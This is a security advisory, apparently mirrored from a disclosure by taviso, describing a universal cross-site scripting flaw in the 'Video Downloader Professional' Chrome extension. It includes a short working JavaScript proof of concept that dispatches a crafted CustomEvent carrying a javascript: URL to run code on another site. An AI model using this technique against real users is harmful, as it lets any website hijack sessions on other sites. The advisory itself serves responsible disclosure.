Video Downloader Universal Cross Site Scripting

2018.04.07
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

Video Downloader Extension: Universal XSS Browsing through the list of most popular Chrome extensions, I noticed this extension with 4M users: https://chrome.google.com/webstore/detail/video-downloader-professi/elicpjhcidhpjomhibiffojpinpmmpil?hl=en It has a pretty obvious universal XSS (i.e. it effectively lets any site take over any other site). Any website can do this: // Change the active tab window.open("https://google.com"); // Run code in the new tab setTimeout('document.dispatchEvent(new CustomEvent("link64_msgAddLinks", {detail: {type: "__L64_NAVIGATE_CHROME_URL", url: "javascript:alert(document.title);window.close()"}}))', 1000); That will run arbitrary code on <a href="http://google.com" title="" class="" rel="nofollow">google.com</a>. I reported this bug to the cws team. This bug is subject to a 90 day disclosure deadline. After 90 days elapse or a patch has been made broadly available, the bug report will become visible to the public. Found by: taviso


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top